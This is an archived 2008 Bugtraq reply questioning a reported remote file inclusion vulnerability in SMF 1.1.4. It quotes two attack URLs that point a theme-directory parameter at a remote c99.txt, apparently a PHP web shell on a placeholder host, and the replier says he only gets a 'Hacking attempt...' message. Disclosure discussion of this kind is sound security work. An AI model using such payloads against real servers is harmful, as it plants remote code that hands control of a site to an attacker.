lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <6.1.2.0.2.20080328170632.05f7ce50@pop.avast.com> Date: Fri, 28 Mar 2008 17:07:13 +0100 From: Jindrich Kubec <kubecj@....cz> To: sibertrwolf@...e.com Cc: bugtraq@...urityfocus.com Subject: Re: Smf 1.1.4 Remote File Inclusion Vulnerabilities At 11:00 28.3.2008, sibertrwolf@...e.com wrote: ># >/Sources/Subs-Graphics.php?settings[default_theme_dir]=http://bilmemne.siz/c99.txt? ># ># /Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt? What is it supposed to do? I'm getting only "Hacking attempt..." Jindroush (kubecj@...st.com)